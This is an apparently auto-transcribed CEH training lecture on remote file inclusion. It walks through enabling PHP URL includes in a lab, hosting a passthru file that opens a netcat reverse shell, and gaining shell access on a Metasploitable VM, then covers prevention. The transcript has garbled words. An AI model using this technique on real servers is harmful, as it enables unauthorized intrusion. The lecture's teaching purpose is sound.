EC Council CEH 312-50 V11 – Website Hacking – File Upload, Code Execution & File Inclusion Vulns part 2
- Remote File Inclusion Vulnerabilities – Configuring PHP Settings
Remote file inclusion is a special case of file inclusion vulnerabilities. We’ve seen in the previous video how we were able to include any file in the server and have access to it through local file inclusion vulnerabilities. In today’s video, if the server is configured to allow a certain function called Allow URL and Allow URL f open, then we will be able to include any file from any computer into the target website. So we’ll literally be able to inject any PHP file into the target computer. What this would lead to is basically we can run payloads, we can run reverse shells, and we can run even system commands and get access to the target or full control to the target server. So first of all, let’s just go here and we’ll be using the same file inclusion variability that we were using in the previous video.
So it’s in the page parameter right here. The only difference is you need to enable the function that makes this, that converts the local file inclusion to a remote file inclusion. So hence the name local allows you to access local files. Remote will allow you to access and inject remote files. So to enable that, I’m going to go to my metasploitable machine, I’m just going to show you how to enable it so you can test this vulnerability yourself. So we’re coming here to our metasploitable and I’m going to go into the PHP settings. So the PHP settings are stored in a file and to access that we’re going to use Nano, which is a text editor.
And then I’m going to put the file location which is an etc PHP, five TGI and PHP ine. So that’s the location where the PHP configuration is stored. I’m going to open it using a file editor called Nano and I’m just going to exit this, I’m going to open it as pseudo as the root. Actually in Kali we never needed to use pseudo because we log in as root, but with metasploitable you need to use pseudo when you want to do root actions. So you say pseudo and then you put the command that you want to run. Okay, so these are deconfigurations for the PHP that’s installed on the web server on the target and we’re looking for a function called Allow URL f open.
So I’m going to type in control and W at the same time and that’ll allow me to search, and I’m going to search for Allow URL and we can see here that I have Allow URL of open is on and Allow URL include is on as well. So these two functions, if they’re enabled, then the local file inclusion vulnerability that we have can be used as a remote file inclusion. So to exit this control on X and it’s going to ask you if you want to save, just type in Y and enter. For me, I didn’t change anything, so I didn’t need to do that. Once you do that, you need to restart your web server. So you’re going to do etc in it deep. Apache two restart. And you’ll need to do this as pseudo, actually. And this is done now, so everything should be ready for you. It’s you.
- Remote File Inclusion Vulnerabilities – Discovery & Exploitation
Just like we did before. In the last video, we put five times back and then we put etc password to access the password file. What we’re going to do today is we’re going to try to access a file located on a different server. So if you’re doing this pen test on an actual web server, then you need to store the file that you want to access needs to be stored on a place with a real IP address address, or with a domain name. I’m doing this on my local server. So I’m going to store this on the web server, on the cali machine on the 1020 14 to three. This is 1020 14 to four, and I’m going to store my file on 1020 14 to three. So that file, as I said, can be anything. It could be a webshell, it could be a payload.
What I’m going to do is I’m going to create a very simple PHP file. So this is just the PHP start and end of the file. And what I’m going to put in the file, I’m going to use a function called pass through. And in that function, basically what this function does, it executes operating system commands, so it executes windows Linux, or dependent on the web server, it’s going to execute commands related to that. So you put the command here between the two quotation marks and I’m going to use the same command we used with the code execution vulnerability, which was the netcat command, which allowed us to get a connection or reverse connection from our target.
So I’m going to paste that here. So let’s just first have a look on this. So PHP and the end, these are just the start and the end of the file, of the PHP file. Passthrough is a function that I’m going to use which executes any command that’s inserted between the quotations. And I’m using the same command that we used in the command execution vulnerability, which will just do a reverse connection to my computer. So this is all good. Now the next step is the most important step, and it’s storing this file. So as I said, if your target was a remote web server, then you should be storing this file in a place with a real IP where you can access it from the remote web server.
Now I’m going to be trying to access this from my metasploitable machine, which is able to access files stored on the cali machine because they’re both on the same network. And I’m going to be calling this, I’m going to be storing it in my VAR, www HTML so it’s being stored on the kali, not on the metasploitable, and I’m going to call it reverse and I’m going to save it as TXT, not PHP.And I’m doing this, if I start it as a PHP, it’s going to be executed on the kali machine. So it’s going to create a reverse connection from the kali machine and I don’t want that. I don’t want to hack the cali machine. I actually already have access to the kali machine. The one that I want to hack is the metasploitable machine and that one is stored remotely.
So in order to be able to include the PHP code and execute it on the remote machine, we’re going to use it as TXT and get it executed on the metasploitable machine instead of executing it on my kali. So I’m starting it as a TXT and I’m going to save it. And now let’s just see here. So if I go to my local host and if I say reverse TXT, we’ll see our file right here. So again, this is on my localhost, which is not the metasploitable machine. It’s 1020 14 to three and the metasploitable is on two four. So how are we going to run this? First, let me just listen for connections like we did before, so it’s just going to be netcat bvlp 80 80. And then right here, instead of including a file on the same server, I’m going to include a remote file and the command is going to be http.
So it’s just going to be the link to this file so we can access the file here as TXT. I’m going to copy it and paste it here. And also in some cases you might need to add a question mark to the end to get this file to be executed as PHP. So I’m just going to go over this again for one more time, including a remote file, which is on a remote server. Make sure the remote server is accessible by your target, and also make sure you store it as TXT, because if you keep it as PHP, this file, the reverse file will be executed on the remote server, so it will be executed on the 203 instead of being executed on the 204.
And I’m keeping it as TXT. This way it’s going to be executed on the 204 and it’s going to give me a remote connection to this computer, to the metasploitable computer. So if I come back here, as you can see, we have a remote connection. If we do a unime a, you’ll see that this is the metasploitable machine, not the cali machine. So we basically have full access to the metasploitable machine through a remote file inclusion vulnerability. Now if we do an LS, we can do a PWD to see where we are and we can literally run any Linux command we want now on the machine and do anything we want. Basically we have full access to that machine.
- Preventing The Above Vulnerabilities
Let’s talk about how we can prevent these vulnerabilities. Now the first thing is a lot of these vulnerabilities exist because of the functionality they provide. For example, the file upload problem we had. It allows the user to upload any file extension, any file type. This shouldn’t happen. There shouldn’t be a way for users to upload any files they want. Maybe if you want them to upload a picture then make sure they’re uploading a picture. Check the file types. If you’re expecting them to upload a song, an MP3 file, make sure it’s a media file. It’s not a PHP or an executable code. Usually you should never allow users to upload any executables. Filters can be used to check whether to check the extension and make sure that the file is being uploaded that is a JPEG or whatever.
But that’s not a good way. The best way is to check the file type and make sure the file type is a picture or is a media file instead of checking the extension because that can be bypassed as well. The second type of vulnerabilities that we looked at was the code execution vulnerabilities. In these exploits we were able to run any code we wanted on the target computer. Again, this functionality should be avoided. You should avoid allowing users to run any sort of code on your server. Try to avoid all these functions such as the eval pass through and all these functions that allow a user to run operating system code on the server. If you absolutely had to use something like it then make sure you analyze the input before you execute it.
For example, in the example we seen the code was doing a ping and it’ll ping anything we put in the text box. So I’m putting here text box just to show that this is the input that we put in the text box. This is what the program actually looks like. If it looks complicated, forget about it. We’re just talking about the concept here. So we’re going to be talking about this here. So say for example, what we did is we put a normal IP and then we put the semicolon and then we put a command that we wanted to do. So we did for example LSLA the problem with this is the web application used to take this the way it is, copy it and run it in here which will when you execute this command it’ll do the pink first and then it will.
do the allies ally which is the command that we wanted. What you need to do is for example if you had to do it, what I advise is you just don’t use these functions. If you had to use a function like this then what you should do is check that the input is what you’re expecting. For example, you’re expecting an IP address and nothing else. So you can use regex to make sure. Now I’m not going to talk about regex or what regex is. Rejects is basically a rule that will make sure that the input looks on the following format. So it takes a digit, digit, digit, digit, digit, digit, digit, digit, which if I put anything else, then the web application should refuse it. You can also make sure that there is no semicolons and that there is no spaces. So everything comes in as one thing and then it gets executed again.
This is a way of making it more secure, but the best thing is just to avoid these functions. The third type of vulnerability that we looked at was the file inclusion. And we looked at two types, the local file inclusion which allowed us to include any file on the system and then read files which will cause a file disclosure vulnerability, and then you’d be able to read any file on the server. And then we looked at the remote file inclusion, which is very dangerous, which allowed us to include any file from any web server. So we were able to include PHP shells and then get connection from the target computer to prevent these. First of all, make sure you prevent the remote file inclusion, so just in case anything goes wrong, people can’t include files from outside your server.
And you can do that the same way we enabled it using the PHP I knee by disabling the Allow URL of Open and Allow URL include. And if we go here to our metasploitable, I’ll just show you very quick. So if we do pseudo nano, which is the text editor atcphipphp in the same file that we used, this is the file for the PHP settings, if you open that file. And now I’m going to do CTRL W and look for allow URL. And you want to make sure that the Allow URL of Open is set to off, and Allow URL include is set to off as well. Control x, y and Enter and that will save it for you. The other way to prevent these exploits is to use static file inclusion. So instead of using dynamic file inclusion, which we see in, you can hard code the files that you want to include in the code and not get them using Get or post.
For example, what’s happening in the examples we see in the vulnerable examples is we have a page called page or index PHP, and then this index PHP takes a parameter called page and then it takes another page, for example, news PHP, and it includes this news PHP in the code. So what’s the code look like in the PHP code you’ll see something like include. So what this will do basically, and that looks like this, I believe, what this do, it includes whatever comes after the page parameter. So the code will dynamically takes whatever that comes in after the page parameter and includes it in the current page. So this will be in the index PHP page. Okay, this is very bad. Because even if it’s not yet, sometimes people use post.
And in post, you won’t see this, so it will be posted. But you can use a proxy such as Burp proxy, and this would look like that. And then you can modify it and get it to include anything you want. And then it’s displayed on the page. What we really want to do is we want the user not to be able to manipulate with what’s going to be included. So if you wanted to include a page called news PHP, just included inside this without giving the user the ability to change it, I know you’re going to program your code to just have it looking like this. But the users, we know, we’ve seen how users can play with this and just get it to include anything they want. So the best way to do it is just to get it to include page PHP. So your code is not using any variables, it’s hard coded, it might make your code longer, but it’s, it’s much more secure.